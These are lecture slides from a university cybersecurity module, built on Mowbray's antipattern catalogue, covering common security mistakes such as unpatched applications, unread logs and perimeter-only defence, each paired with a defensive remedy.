Cyber Network Security

Concepts
Module-4
Prof. Harsha B. K.

Ref: Thomas J. Mowbray, “Cyber Security – Managing Systems, Conducting Testing, and
Investigating Intrusions”, Wiley.
 Contents
• Antipattern problem
• Refactored solution
• Cybersecurity antipattern catalog
 Why start with Antipatterns
• The first step is to admit we have a problem
• Solving cybersecurity issues requires
• radical new ways of thinking,
• paradoxically, a return to first principles
• common sense
• “Technology is not the problem…people are the problem”
 Security Architecture
• The cybersecurity crisis is a fundamental failure of
architecture
• Majority of deployed software create significant
opportunities for malicious exploitation
• Properly engineered infrastructure and software
technologies withstand known and manage unknown risks
 Antipattern:

Signature-Based Malware Detection versus

Polymorphic Threats
• Conventional wisdom all systems with up-to-date antivirus
signatures are safe
• Current signature-based antivirus engines ?
• Malicious signature growth
• Malware variability has grown so rapidly that signature-
based detection is rapidly becoming obsolete
 Refactored Solution:

Reputational-, Behavioral-, and

Entropy-Based Malware Detection
• Symantec : Reputation-based signatures
• FireEye : Behavioral Intrusion Detection System (IDS)
• Entropy : Mathematical similarity to known malware
signatures
 Antipattern:

Document-Driven Certification
and Accreditation
• Assessment and Authorization (A&A) Certification and
Accreditation (C&A)
• A&A is the process of assuring the information security of
systems before they are deployed
• Certification is an assessment and testing phase
• Accreditation is an executive approval process
 Antipattern:

Proliferating IA Standards with

No Proven Benefits
• NIST a U.S. government organization with dozens of IT security publications
• NIST SP 800-39 : Defines integrated enterprise-wide risk management
processes across entire portfolios of systems and business activities
• NIST SP 800-37 : Defines the process for lifecycle risk management
• NIST SP 800-30 : Defines how to conduct a risk assessment for a single system
• NIST SP 800-53 : Contains the standard catalog of security controls. These
controls are requirements that address all aspects of information security
• NIST SP 800-53A: Defines how to implement security controls, including test,
interview, and review procedures
Global Information Grid Policy
Landscape
 Antipattern:

Policy-Driven Security Certifications Do Not

Address the Threat
• The gold standard of professional security certifications is the
Certified Information System Security Professional (CISSP)
• An entirely paper-based qualification
• Requiring a great deal of memorization in 10 diverse security domains
• physical security
• communications security
• systems security

• This paradox was addressed by the Center for Strategic and International
Studies (CSIS), which released a Presidential Commission report
 Refactored Solution:

Security Training Roadmap

• One approach is through professional training in hands-on skills
• SANS Institute and a handful of other places.
• Network Device Specialist
• Operating System Security Specialist
• Database Security Specialist
• System Forensics Specialist
• Reverse Engineering Malware Specialist
Antipatterns Concept
 Forces in Cyber Antipatterns
• Functionality
• Confidentiality
• Integrity
• Availability
 Cyber Antipattern Templates
Two templates
• Micro-antipattern template
• Full cyber antipattern template
 Micro-Antipattern Templates
Components of Micro-Antipattern Templates
• Name
• Antipattern Problem
• Refactored Solution
Full Cyber Antipattern Template
Heading fields Body fields
• Antipattern Name • Background
• Also Known As • Antipattern Solution
• Refactored Solution • Causes, Symptoms, and
Names Consequences

• Unbalanced Primal Forces • Known Exceptions

• Refactored Solution and Examples
• Anecdotal Evidence
• Related Solutions
 Cybersecurity Antipattern
Catalog
Antipatterns, cyber mistakes, and bad security habits with prevalent antipatterns:
1. Can’t Patch Dumb
2. Unpatched Applications
3. Never Read the Logs
4. Networks Always Play by the Rules
5. Hard on the Outside, Gooey in the Middle
6. Webify Everything
7. No Time for Security
 Can’t Patch Dumb
• Antipattern Name : Can’t Patch Dumb
• Also Known As : Social Engineering, Phishing, Spam, Spyware,
Drive-by Malware, Ransom-Ware, Autoplay Attacks
• Refactored Solution Names : Security Awareness
• Unbalanced Primal Forces : Confidentiality (for example,
divulging private information), integrity (for example, rootkits)
• Anecdotal Evidence : “Technology is not the problem; people
are the problem,” and “Technology is easy; people are difficult.”
 Can’t Patch Dumb
Antipattern Solution
• The end user’s lack of
security awareness
• The spyware problem
• Malicious websites free
antivirus solutions
• Autoplay infections from USB
Causes & Consequences
• Lack of a recurring
security awareness
training program
• Lack of test assessment
 Can’t Patch Dumb
Refactored Solution &
Examples Related Solutions
• Mandatory Security • Website advisors
awareness training
• Using Google
• Annual refresher courses
• Web browser enable
• Articulation of scripts
organization’s policies
• online training program
 Unpatched Applications
• Antipattern Name: Unpatched Applications
• Also Known As: Vendor-Specific Updates, Default
Configuration
• Refactored Solution Names: Patch Management
• Unbalanced Primal Forces: Management of integrity
• Anecdotal Evidence: “Most new attacks are going after
the applications, not the operating systems.”
 Unpatched Applications
Antipattern Solution
• Unpatched applications are one
of the biggest security risks
• Add-on applications such as
QuickTime
• Release patches for the
problems at the same time that
the defects are announced
Causes & Consequences
• Automatic update disabled on any
application where it’s available
• Never visit vendor websites for updates
• No inventory of applications and vendors
• No update maintenance schedule
• Not reviewing the US-CERT bulletins
• No governance of application versions
 Unpatched Applications
Refactored Solution &
Known Exceptions Examples
• If software product support has • Inventory of systems and
expired? installed software
• Migration to a supported version packages
is strongly recommended
• Maintain a list of approved
• Enable automatic updates
standard versions of all software on Windows
applications
 Unpatched Applications

Related Solutions
• Data center provisioning environments to assure patch
management and policy configurations
• Locked-down standard system images, data centers are
able to deploy virtual servers which conform to security
baselines, and perform mass updates
 Never Read the Logs
• Antipattern Name: Never Read the Logs
• Also Known As: Guys Watching Big Network Displays Miss
Everything, Insider Threat, Advanced Persistent Threat (APT),
Network Operations Center (NOC)
• Refactored Solution Names: Advanced Log Analysis
• Unbalanced Primal Forces: Management of confidentiality
• Anecdotal Evidence: Nick Leeson at Barings Bank, Wikileaks,
Aurora Cyber Intrusions
 Never Read the Logs
Antipattern Solution
• Network operating centers
• Alerting rules to eliminate
false positive alarms
• Disabled IDS alerting rules
introduce vulnerabilities
Causes & Consequences
• Nobody responsible for reading
network, system, and security logs.
• No health and status monitoring of
syslog events.
• No alarm rules for Windows
configurations.
• New IDS yields numerous alerts.
• Many IDS rules disabled.
 Never Read the Logs

Refactored Solution and Examples

• Reading the logs is an essential periodic activity
• Depending on the criticality of the applications, it might be necessary to
review the logs daily or multiple times throughout the day
• Review the system security event logs, system logs, network device logs,
and IDS/IPS logs regularly
• Do not always depend on the versions in the centralized log manager
 Networks Always Play by the
Rules
• Antipattern Name: Networks Always Play by the Rules
• Also Known As: Trust All Servers, Trust All Clients, Do You Believe in
Magic?
• Refactored Solution Names: System Hardening, State-of-the-Art
Wireless Security Protocols
• Unbalanced Primal Forces: Management of confidentiality and
integrity
• Anecdotal Evidence: In wireless, the access point with the strongest
signal is the one that user devices will trust, even if it’s malicious.
 Networks Always Play by the
Rules
Antipattern Solution
• Internet was not designed with
security in mind
• Free security tool called Karma
• Yersinia is a security research
tool that generates network
layer 2 attacks
Causes & Consequences
• Lack of server authentication
(HTTP, Wi-Fi, GSM, DNS, SMTP)
• Lack of client authentication
(HTTP, HTTPS)
• Not monitoring networks for
malformed protocols and packets
 Networks Always Play by the
Rules
Refactored Solution &
Examples Related Solutions
• Inherent weaknesses in • fundamental rethinking of
Internet the Internet with much
• Use cybersecurity best stronger support for
practices delegation of trust and
attribution of user actions
• Wi-Fi-enabled laptops to
require host authentication
 Hard on the Outside, Gooey in the
Middle
• Antipattern Name: Hard on the Outside, Gooey in the Middle
• Also Known As: Tootsie Pop, Defense in Depth, Perimeter
Security, Protect Everything from All Threats
• Refactored Solution Names: HBSS, Network Enclaves
• Unbalanced Primal Forces: Management of confidentiality
• Anecdotal Evidence: “Each user’s browser is sending
thousands of spyware beacons every day!”; Advanced Persistent
Threat; “Our networks are totally secure; we have a firewall.”
 Hard on the Outside, Gooey in
the Middle
Antipattern Solution
• Internet boundary DMZ
• The data center storage SAN
• Intranet
• In theory, firewalls protect
the network by hiding the
internal IP addresses
• The outgoing ports are open on
virtually all firewalls
• Malware and spyware writers are
well aware of this fact, and craft
their code to take advantage of
these ubiquitously open ports
• To the firewall, these packets
appear to be ordinary web traffic
 Hard on the Outside, Gooey in
the Middle
Refactored Solution &
Causes & Consequences Examples
• No protected network enclaves • Intranet security should be
inside the firewall on the carefully designed
intranet
• most critical information assets
• No HBSS deserves additional protection
• No configuration monitoring • State-of-the-art security
• Other cyber antipatterns such as solutions (configuration
Never Read the Logs monitoring)
 Webify Everything
• Antipattern Name: Webify Everything
• Also Known As: Cross-site scripting, Cross-site Request Forgery, US
Power Grid on Internet, Global Financial System on Internet
• Refactored Solution Names: Physical Separation, Out of Band
Separation
• Unbalanced Primal Forces: Management of integrity and availability
• Anecdotal Evidence: “Why the hell would they put the electrical
power grid on the Internet?”
 Webify Everything

Background Antipattern Solution

• Computer technology’s crawl-walk- • Defies common sense when it
run evolution is very trendy to
eliminate installed applications
proliferates web interfaces
entirely and rely on web-based for critical infrastructure
interfaces for everything
• The problem is compounded
• All the headaches of managing
by the common malware
applications are conveniently
delegated to some remote entity technique called crosssite
providing software as a service. scripting (XSS)
 Webify Everything

Causes & Consequences

• Web browsers are user interface platform for applications, called thin clients
• Used ubiquitously and are convenient for system administrators there is no
client software installation or client software updates
• Users are in the habit of opening multiple browser tabs and connecting with
multiple websites
• Websites with malicious content are a significant and prevalent threat.
Malicious content can be embedded in site or through advertisements
supplied by third parties
 Webify Everything
Refactored Solution &
Examples Related Solutions
• Software VPNs provide out-of- • Using a dedicated,
band separation of physically separate
communications across public
computer for all financial
networks meaning that
interception of packets using
transactions
technologies like network • Much less likely to be
sniffers is essentially prevented compromised by malware
 No Time for Security
• Antipattern Name: No Time for Security
• Also Known As: Add Security Last, Blame Security for Schedule
Slippage, Deliver It Now!
• Refactored Solution Names: Security Requirements Are Real
Requirements, Cyber Risk Management
• Unbalanced Primal Forces: Management of confidentiality,
integrity, and availability
• Anecdotal Evidence: “Wait until it’s time to test the system, and
then worry about security.”
 No Time for Security

Background Antipattern Solution

• Security is usually the final • Developers of software projects,
consideration in the and now also widget developers
development of a system. • Release process will test
security vulnerabilities
• Sometimes security is left
• When confronted, developers
out altogether in the rush can claim ignorance; they are
to get products out the not security experts after all
door.
 No Time for Security

Causes & Consequences Known Exceptions

• Securitywas never part of the • If the software is out-of-the-box, it is
requirements. already near the end of the
development cycle
• Saving on development costs and time
at the expense of security. • can be configured for security just
prior to deployment.
• Project is behind schedule.
• However, you are taking it on faith that
• Shared administrator accounts. the original software developers
• Not training the developers to be accounted for security and built in
security aware. appropriate configuration settings.
 No Time for Security
Refactored Solution &
Examples Related Solutions
• Security risks and requirements • Select security and audit controls
should be analyzed early in the using the Committee on
development cycle at the same Sponsoring Organizations (COSO)
time as functional requirements • Control Objectives for Information
• Stakeholders should categorize and Related Technology (COBIT)
the system, such as: frameworks for commercial
confidentiality high, integrity systems and to satisfy Sarbanes
medium, and availability medium Oxley requirements